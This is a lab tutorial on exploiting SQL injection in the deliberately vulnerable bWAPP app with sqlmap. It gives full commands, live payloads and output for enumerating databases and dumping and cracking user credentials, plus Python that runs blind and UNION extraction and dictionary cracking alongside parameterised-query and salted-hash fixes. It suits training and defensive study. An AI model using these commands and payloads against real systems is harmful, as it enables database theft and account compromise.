SQL Injection: How to use the sqlmap penetration testing tool to exploit SQL injection flaws (sqlmap with bWAPP)

SQL Injection :- An injection attack in which an attacker gets malicious SQL executed by a data-driven, vulnerable application. In other words, SQL fragments are supplied through an input field (or URL parameter) so that they become part of the query the application builds, and the database then returns (or, depending on the account's privileges, modifies) data the attacker was never meant to reach.
In this post we use sqlmap (an open source penetration testing tool) and show how easily database contents can be dumped once we find that a parameter of the application is vulnerable.

bWAPP is a deliberately insecure web application built for learning about web vulnerabilities in a legal, controlled setting. To exploit its SQL injection exercise we first set up sqlmap. I have downloaded and installed "sqlmapproject-sqlmap-1.1.4-1-gb4c4d3f.tar.gz".

Step 1: Get session info -  First get the cookie, either from Burp Suite or by running javascript:alert(document.cookie) in the browser :-  PHPSESSID=q9qo2j05b0l0r7in6bqhsjjvv1; security_level=0. The PHPSESSID must come from a logged-in bWAPP session, because the exercise pages require one; security_level=0 is bWAPP's "low" setting, where no input filtering is applied.

Step 2: - Find a vulnerable parameter - Put a single quote (') in the text field and check for a vulnerability. If we get an error, we know the parameter is injectable: the single quote we injected closed the string literal inside the application's query, the rest of the statement no longer parsed, and the database error was echoed back to us. The screenshot below shows the same.

Step 3:- Our first focus is finding the database names. Execute the following command from the sqlmap installation directory; --cookie carries the session captured in Step 1 and --dbs asks sqlmap to enumerate databases. Two notes on the run below: sqlmap warns that the value of 'title' is empty, and giving it a harmless real value (for example ?title=a) avoids the warning and gives sqlmap a proper baseline response to compare against; and for an unattended run, --batch answers every prompt with its default instead of waiting for y/n.
python sqlmap.py  -u "http://192.168.213.142/vulnerable-web/sqli_1.php?title=" --cookie="PHPSESSID=q9qo2j05b0l0r7in6bqhsjjvv1;security_level=0" --dbs

[zytham@s158519-vm sqlmapprojet]$ python sqlmap.py  -u "http://192.168.213.142/vulnerable-web/sqli_1.php?title=" --cookie="PHPSESSID=q9qo2j05b0l0r7in6bqhsjjvv1;security_level=0" --dbs
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.1.4.1#dev}
|_ -| . [,]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:42:28

[21:42:29] [WARNING] provided value for parameter 'title' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[21:42:29] [INFO] testing connection to the target URL
[21:42:29] [WARNING] potential CAPTCHA protection mechanism detected
[21:42:29] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[21:42:29] [INFO] testing if the target URL is stable
[21:42:30] [INFO] target URL is stable
[21:42:30] [INFO] testing if GET parameter 'title' is dynamic
[21:42:30] [INFO] confirming that GET parameter 'title' is dynamic
[21:42:30] [INFO] GET parameter 'title' is dynamic
[21:42:30] [INFO] heuristic (basic) test shows that GET parameter 'title' might be injectable (possible DBMS: 'MySQL')
[21:42:30] [INFO] heuristic (XSS) test shows that GET parameter 'title' might be vulnerable to cross-site scripting attacks
[21:42:30] [INFO] testing for SQL injection on GET parameter 'title'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n
[21:42:42] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:42:42] [WARNING] reflective value(s) found and filtering out
[21:42:43] [INFO] GET parameter 'title' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Z")
[21:42:43] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[21:42:43] [INFO] GET parameter 'title' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[21:42:43] [INFO] testing 'MySQL inline queries'
[21:42:43] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[21:42:43] [WARNING] time-based comparison requires larger statistical model, please wait............. (done)  
[21:43:14] [WARNING] turning off pre-connect mechanism because of connection time out(s)
[21:43:34] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[21:43:34] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[21:43:34] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[21:43:34] [INFO] target URL appears to have 7 columns in query
[21:43:34] [INFO] GET parameter 'title' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'title' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 39 HTTP(s) requests:
---
Parameter: title (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: title=%' AND 5504=5504 AND '%'='

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: title=%' AND (SELECT 4999 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(4999=4999,1))),0x716a627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND '%'='

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: title=%' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7178716a71,0x4b4a6a4966614a544a66546d774871644a567a5946724f71755749596667466a4858766b4e484171,0x716a627071),NULL,NULL-- mwpe
---
[21:43:38] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0
[21:43:38] [INFO] fetching database names
available databases [7]:
[*] bWAPP
[*] cdcol
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test

[21:43:38] [INFO] fetched data logged to text files under '/home/zytham/.sqlmap/output/192.168.213.142'

[*] shutting down at 21:43:38

Step 4:- Find all users of the database server (these are DBMS accounts, not the rows of the application's users table). Note the ''@'localhost' and ''@'linux' entries in the result: anonymous MySQL accounts of this kind are created by default installs and should be removed on any real system.
python sqlmap.py -u "http://192.168.213.142/vulnerable-web/sqli_1.php?title=" --cookie="PHPSESSID=q9qo2j05b0l0r7in6bqhsjjvv1;security_level=0" --users

[zytham@s158519-vm sqlmapprojet]$ python sqlmap.py  -u "http://192.168.213.142/vulnerable-web/sqli_1.php?title=" --cookie="PHPSESSID=q9qo2j05b0l0r7in6bqhsjjvv1;security_level=0" --users
[*] starting at 21:52:28

[21:52:28] [WARNING] provided value for parameter 'title' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[21:52:28] [INFO] resuming back-end DBMS 'mysql'
[21:52:28] [INFO] testing connection to the target URL
[21:52:29] [WARNING] potential CAPTCHA protection mechanism detected
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: title (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: title=%' AND 5504=5504 AND '%'='

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: title=%' AND (SELECT 4999 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(4999=4999,1))),0x716a627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND '%'='

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: title=%' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7178716a71,0x4b4a6a4966614a544a66546d774871644a567a5946724f71755749596667466a4858766b4e484171,0x716a627071),NULL,NULL-- mwpe
---
[21:52:29] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0
[21:52:29] [INFO] fetching database users
database management system users [5]:
[*] ''@'linux'
[*] ''@'localhost'
[*] 'pma'@'localhost'
[*] 'root'@'linux'
[*] 'root'@'localhost'

[21:52:29] [INFO] fetched data logged to text files under '/home/zytham/.sqlmap/output/192.168.213.142'

[*] shutting down at 21:52:29

Step 5:- Find all table names in the database bWAPP (-D selects the database).
python sqlmap.py -u "http://192.168.213.142/vulnerable-web/sqli_1.php?title=" --cookie="PHPSESSID=q9qo2j05b0l0r7in6bqhsjjvv1;security_level=0" -D bWAPP --tables

[zytham@s158519-vm sqlmapprojet]$ python sqlmap.py  -u "http://192.168.213.142/vulnerable-web/sqli_1.php?title=" --cookie="PHPSESSID=q9qo2j05b0l0r7in6bqhsjjvv1;security_level=0" -D bWAPP --tables
[*] starting at 21:58:33

[21:58:33] [WARNING] provided value for parameter 'title' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[21:58:33] [INFO] resuming back-end DBMS 'mysql'
[21:58:33] [INFO] testing connection to the target URL
[21:58:34] [WARNING] potential CAPTCHA protection mechanism detected
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: title (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: title=%' AND 5504=5504 AND '%'='

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: title=%' AND (SELECT 4999 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(4999=4999,1))),0x716a627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND '%'='

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: title=%' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7178716a71,0x4b4a6a4966614a544a66546d774871644a567a5946724f71755749596667466a4858766b4e484171,0x716a627071),NULL,NULL-- mwpe
---
[21:58:34] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0
[21:58:34] [INFO] fetching tables for database: 'bWAPP'
Database: bWAPP
[6 tables]
+----------+
| blog     |
| dummy    |
| heroes   |
| movies   |
| users    |
| visitors |
+----------+

[21:58:34] [INFO] fetched data logged to text files under '/home/zytham/.sqlmap/output/192.168.213.142'

Step 6:- Find all column names of a given table, here users (-T selects the table).
python sqlmap.py -u "http://192.168.213.142/vulnerable-web/sqli_1.php?title=" --cookie="PHPSESSID=q9qo2j05b0l0r7in6bqhsjjvv1;security_level=0" -D bWAPP -T users --columns

[zytham@s158519-vm sqlmapprojet]$ python sqlmap.py  -u "http://192.168.213.142/vulnerable-web/sqli_1.php?title=" --cookie="PHPSESSID=q9qo2j05b0l0r7in6bqhsjjvv1;security_level=0" -D bWAPP -T users --columns
[*] starting at 22:00:26

[22:00:27] [WARNING] provided value for parameter 'title' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[22:00:27] [INFO] resuming back-end DBMS 'mysql'
[22:00:27] [INFO] testing connection to the target URL
[22:00:27] [WARNING] potential CAPTCHA protection mechanism detected
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: title (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: title=%' AND 5504=5504 AND '%'='

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: title=%' AND (SELECT 4999 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(4999=4999,1))),0x716a627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND '%'='

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: title=%' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7178716a71,0x4b4a6a4966614a544a66546d774871644a567a5946724f71755749596667466a4858766b4e484171,0x716a627071),NULL,NULL-- mwpe
---
[22:00:27] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0
[22:00:27] [INFO] fetching columns for table 'users' in database 'bWAPP'
Database: bWAPP
Table: users
[9 columns]
+-----------------+--------------+
| Column          | Type         |
+-----------------+--------------+
| activated       | tinyint(1)   |
| activation_code | varchar(100) |
| admin           | tinyint(1)   |
| email           | varchar(100) |
| id              | int(10)      |
| login           | varchar(100) |
| password        | varchar(100) |
| reset_code      | varchar(100) |
| secret          | varchar(100) |
+-----------------+--------------+

[22:00:27] [INFO] fetched data logged to text files under '/home/zytham/.sqlmap/output/192.168.213.142'

Step 7:- Dump the users data - login, email, password, etc. (-C restricts the dump to the listed columns; --dump fetches the rows).

python sqlmap.py -u "http://192.168.213.142/vulnerable-web/sqli_1.php?title=" --cookie="PHPSESSID=q9qo2j05b0l0r7in6bqhsjjvv1;security_level=0" -D bWAPP -T users -C login,email,password,secret --dump

[zytham@s158519-vm sqlmapprojet]$ python sqlmap.py  -u "http://192.168.213.142/vulnerable-web/sqli_1.php?title=" --cookie="PHPSESSID=q9qo2j05b0l0r7in6bqhsjjvv1;security_level=0" -D bWAPP -T users -C login,email,password,secret --dump
[*] starting at 22:03:44

[22:03:44] [WARNING] provided value for parameter 'title' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[22:03:44] [INFO] resuming back-end DBMS 'mysql'
[22:03:44] [INFO] testing connection to the target URL
[22:03:45] [WARNING] potential CAPTCHA protection mechanism detected
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: title (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: title=%' AND 5504=5504 AND '%'='

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: title=%' AND (SELECT 4999 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(4999=4999,1))),0x716a627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND '%'='

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: title=%' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7178716a71,0x4b4a6a4966614a544a66546d774871644a567a5946724f71755749596667466a4858766b4e484171,0x716a627071),NULL,NULL-- mwpe
---
[22:03:45] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0
[22:03:45] [INFO] fetching entries of column(s) 'email, login, password, secret' for table 'users' in database 'bWAPP'
[22:03:45] [INFO] analyzing table dump for possible password hashes
[22:03:45] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[22:04:16] [INFO] using hash method 'sha1_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/home/zytham/sqlmapprojet/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[22:04:17] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[22:04:20] [INFO] starting dictionary-based cracking (sha1_generic_passwd)
[22:04:20] [INFO] starting 4 processes
[22:04:25] [INFO] cracked password 'bug' for user 'A.I.M.'                                                      
[22:04:32] [INFO] postprocessing table dump                                                                    
Database: bWAPP
Table: users
[2 entries]
+--------+--------------------------+------------------------------------------------+-------------------------------------+
| login  | email                    | password                                       | secret                              |
+--------+--------------------------+------------------------------------------------+-------------------------------------+
| A.I.M. | bwapp-aim@mailinator.com | 6885858486f31043e5839c735d99457f045affd0 (bug) | A.I.M. or Authentication Is Missing |
| bee    | bwapp-bee@mailinator.com | 6885858486f31043e5839c735d99457f045affd0 (bug) | 9999                                |
+--------+--------------------------+------------------------------------------------+-------------------------------------+

[22:04:32] [INFO] table 'bWAPP.users' dumped to CSV file '/home/zytham/.sqlmap/output/192.168.213.142/dump/bWAPP/users.csv'
[22:04:32] [INFO] fetched data logged to text files under '/home/zytham/.sqlmap/output/192.168.213.142'
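The single-quote check from Step 2 and the blind enumeration sqlmap carried out in Steps 3 to 7 can be reproduced in miniature. The following Python is an added example, not code from this post, from sqlmap or from bWAPP. It models the sqli_1.php search with an in-memory SQLite database as a stand-in for MySQL (so the MySQL-only FLOOR/RAND error-based payload is not reproduced), assumes from the payload shape `%' ... AND '%'='` that the title is concatenated into a `LIKE '%...%'` pattern, and uses a constructed movies table with the seven columns sqlmap reported (column names and rows are assumptions) plus a constructed users row carrying the bee login and hash from the dump above. It shows why the lone quote errors, how the boolean-based payload acts as a true/false oracle, how that oracle extracts a string one character at a time (a binary search, about eight requests per character, which is what sqlmap does behind --tables and --dump when it relies on the blind technique), the seven-column UNION variant from the transcript, and the parameterised query that closes the hole.

```python
"""Added example (not the post's, sqlmap's or bWAPP's code): a model of the
sqli_1.php search.  SQLite stands in for MySQL."""
import sqlite3

# Constructed stand-in for the bWAPP database.  Seven movie columns match the
# count sqlmap reported; names and rows are assumed.  The users row carries
# the login and SHA-1 hash shown in the dump.
_DB = sqlite3.connect(":memory:")
_DB.executescript("""
CREATE TABLE movies(id INTEGER, title TEXT, release_year INTEGER, genre TEXT,
                    main_character TEXT, imdb TEXT, tickets_stock INTEGER);
INSERT INTO movies VALUES (1,'The Matrix',1999,'sci-fi','Neo','tt0133093',7);
INSERT INTO movies VALUES (2,'Iron Man',2008,'action','Tony Stark','tt0371746',10);
CREATE TABLE users(id INTEGER, login TEXT, password TEXT, secret TEXT);
INSERT INTO users VALUES (1,'bee','6885858486f31043e5839c735d99457f045affd0','9999');
""")


def search_movies_vulnerable(title):
    """Vulnerable: the user value is spliced into the SQL text (the LIKE
    '%...%' shape is assumed from the payloads sqlmap reported)."""
    sql = "SELECT * FROM movies WHERE title LIKE '%" + title + "%'"
    return _DB.execute(sql).fetchall()


def search_movies_safe(title):
    """Hardened: the value travels as a bound parameter, never as SQL."""
    sql = "SELECT * FROM movies WHERE title LIKE ?"
    return _DB.execute(sql, ("%" + title + "%",)).fetchall()


def quote_breaks_query(search):
    """Step 2 check: does a lone single quote make the statement unparsable?"""
    try:
        search("'")
        return False
    except sqlite3.OperationalError:
        return True


def oracle(cond):
    """Boolean-blind oracle in the shape sqlmap found:
    title=%' AND <cond> AND '%'='   ->  rows come back iff <cond> is true."""
    return len(search_movies_vulnerable(f"%' AND {cond} AND '%'='")) > 0


def blind_int(expr, lo=0, hi=255):
    """Binary-search the integer value of an SQL expression through the
    oracle: about 8 requests per value instead of up to 256."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"({expr})>{mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_string(subquery):
    """Extract a string: first its length, then the code point at each
    position (sqlmap's blind technique in miniature)."""
    length = blind_int(f"length(({subquery}))")
    return "".join(chr(blind_int(f"unicode(substr(({subquery}),{i},1))"))
                   for i in range(1, length + 1))


def union_extract(column_subquery):
    """UNION technique with the 7-column layout from the transcript: the
    injected row carries the wanted value in the 5th column; '-- ' comments
    out the trailing %' that the application appends."""
    payload = (f"%' UNION ALL SELECT NULL,NULL,NULL,NULL,({column_subquery}),"
               "NULL,NULL-- ")
    rows = search_movies_vulnerable(payload)
    return [r[4] for r in rows if r[0] is None]


if __name__ == "__main__":
    table_q = "SELECT name FROM sqlite_master WHERE type='table' AND name<>'movies'"
    hash_q = "SELECT password FROM users WHERE login='bee'"
    print("quote breaks vulnerable query:", quote_breaks_query(search_movies_vulnerable))
    print("quote breaks safe query:      ", quote_breaks_query(search_movies_safe))
    print("oracle 1=1:", oracle("1=1"), " oracle 1=2:", oracle("1=2"))
    print("table name via blind:", blind_string(table_q))
    print("hash via blind:      ", blind_string(hash_q))
    print("hash via UNION:      ", union_extract(hash_q))
    print("safe search fed the payload:", search_movies_safe("%' AND 1=1 AND '%'="))
```

The parameterised version is fed exactly the same payload and simply searches for a title containing that odd string; nothing reaches the database as SQL, which is why prepared statements, not input filtering, are the fix.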

The screenshot below shows the same: the user details with the cracked password. Notice that A.I.M. and bee have identical hashes, which means the application stores plain, unsalted SHA-1 of the password, so equal passwords are visible as equal hashes and a single dictionary run cracks both.
The hash can also be cracked with an online lookup service; the screenshot below shows the same. On a real engagement, do not submit client hashes to third-party sites.
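The dictionary attack sqlmap ran on the dumped password column, and the storage scheme that would have resisted it, as an added example (not the post's or sqlmap's code). The hash is the one sqlmap labelled sha1_generic_passwd above, so cracking is nothing more than hashing candidates and comparing; the wordlist and suffix list are constructed here and stand in for sqlmap's txt/wordlist.zip and its "common password suffixes" option. The second half shows per-user salted PBKDF2-HMAC-SHA256 (600,000 iterations, the current OWASP figure), under which two users with the same password no longer share a stored value.

```python
"""Added example (not the post's or sqlmap's code): dictionary cracking of the
dumped unsalted SHA-1, beside a salted, slow alternative."""
import hashlib
import hmac
import os

# Hash taken from the users dump in the post (logins 'A.I.M.' and 'bee').
DUMPED_HASH = "6885858486f31043e5839c735d99457f045affd0"

# Constructed stand-ins for sqlmap's wordlist and suffix rules (assumed).
WORDLIST = ["password", "letmein", "admin", "bee", "bug"]
SUFFIXES = ["", "1", "123", "!", "2017"]

PBKDF2_ROUNDS = 600_000   # OWASP guidance for PBKDF2-HMAC-SHA256


def sha1_hex(text):
    return hashlib.sha1(text.encode("utf-8")).hexdigest()


def looks_like_sha1(h):
    """The shape test behind sqlmap's 'recognized possible password hashes':
    40 hex characters."""
    return len(h) == 40 and all(c in "0123456789abcdef" for c in h.lower())


def crack_sha1(target, words=WORDLIST, suffixes=SUFFIXES):
    """Return the candidate whose SHA-1 equals target, or None.  Unsalted SHA-1
    is fast, so every word+suffix combination costs one hash."""
    target = target.lower()
    if not looks_like_sha1(target):
        return None
    for word in words:
        for suffix in suffixes:
            candidate = word + suffix
            if sha1_hex(candidate) == target:
                return candidate
    return None


def store_password(password, salt=None):
    """What the application should store instead: (salt, PBKDF2 digest) with a
    fresh random salt per user and a deliberately slow derivation."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 salt, PBKDF2_ROUNDS)
    return salt, digest


def verify_password(password, salt, digest):
    """Constant-time comparison of a fresh derivation against the stored one."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate, digest)


if __name__ == "__main__":
    print("cracked:", crack_sha1(DUMPED_HASH))
    salt_a, digest_a = store_password("bug")
    salt_b, digest_b = store_password("bug")
    print("same password, same stored value?", digest_a == digest_b)
    print("verify bug:", verify_password("bug", salt_a, digest_a),
          " verify bee:", verify_password("bee", salt_a, digest_a))
```

With the salted scheme a dumped table no longer reveals which accounts share a password, and each guess costs 600,000 HMAC iterations per account instead of one SHA-1, so the dictionary run that took sqlmap seconds above becomes impractical.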


For more detail about sqlmap, refer to: https://github.com/sqlmapproject/sqlmap/wiki
